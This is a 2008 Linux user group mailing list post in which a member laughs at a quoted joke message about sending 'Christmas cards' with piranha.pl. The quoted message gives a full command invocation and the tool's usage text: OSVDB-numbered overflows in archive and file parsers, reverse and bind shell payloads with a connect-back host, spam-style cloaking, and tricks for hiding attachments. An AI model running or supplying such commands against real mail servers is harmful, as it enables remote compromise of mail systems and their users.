HackFest Series: Email Christmas Cheer

Stephen cryptworks at gmail.com
Thu Dec 25 13:03:10 MST 2008 

That's twisted but funny

On 12/25/08, Lisa Kachold <lisakachold at obnosis.com> wrote:
>
>
>
>
>
>
>
>
>
>
> Send some Christmas cards:
>
> $ piranha.pl -e 4 -c 1 -l mynewshellhost -h mail.mydomain.com -a
> myname at mydomain.com
>
>
> Usage: piranha.pl [MANDATORY ARGS] [OPTIONAL ARGS]
>
> Mandatory arguments:
>   -e+           Exploit number to use (See below)
>   -h+           SMTP server to test
>   -a+           Destination email address used in probing
>
> Optional arguments:
>   -s+          Shellcode type to inject into exploits (See below)
>   -c+          Cloaking style (See below)
>   -d+          Try to vanish attachments from MUA's view (See below)
>   -v            Attach EICAR virus to improve stealthness
>   -z            Pack all the malware into a tarball to be less noisy
>   -p+          Port to use in reverse shell or bind shell
>   -l+           Host to connect back in reverse shell mode
>
> Valid exploits numbers:
>    0            OSVDB #5753:    LHA get_header File Name Overflow
>    1            OSVDB #5754:    LHA get_header Directory Name Overflow
>    2            OSVDB #6456:    file readelf.c tryelf() ELF Header Overflow
>    3            OSVDB #11695:   unarj Filename Handling Overflow
>    4            OSVDB #23460:   ZOO combine File and Dir name overflow
>    5            OSVDB #15867:   Convert UUlib uunconc integer overflow
>    6            OSVDB #XXX:     ZOO next offset infinite loop DoS
>
> Valid shellcode types:
>    0            TCP reverse shell
>    1            UDP reverse shell
>    2            TCP bind shell
>
> Valid cloaking styles (consult whitepaper for visual result):
>    0            No cloaking at all (default)
>    1            Viagra spam message
>    2            "Look at the pictures I promised you!"
>
> Vanishing techniques for attachments:
>    0            No vanishing at all (default)
>    1            Multipart/alternative trick
>    2            <img src="image.JPG" width=0 height=0> trick
>
> www.Obnosis.com |  http://en.wiktionary.org/wiki/Citations:obnosis |
> hackfest.obnosis.com (503)754-4452
> January PLUG HackFest = Kristy Westphal, AZ Department of Economic Security
> Forensics @ UAT 1/10/09 12-3PM
> Take the Black [Linux XP/Vista BackTrack3] Pill & leave SecurityMatrix, or
> take the Blue [XP/Vista Update] Pill & stay happily ignorant.
>
> http://uncyclopedia.wikia.com/wiki/Satan_Claus
> _________________________________________________________________
> Send e-mail anywhere. No map, no compass.
> http://windowslive.com/oneline/hotmail?ocid=TXT_TAGLM_WL_hotmail_acq_anywhere_122008

-- 
Sent from my mobile device

A mouse trap, placed on top of your alarm clock, will prevent you from
rolling over and going back to sleep after you hit the snooze button.

Stephen

More information about the PLUG-discuss mailing list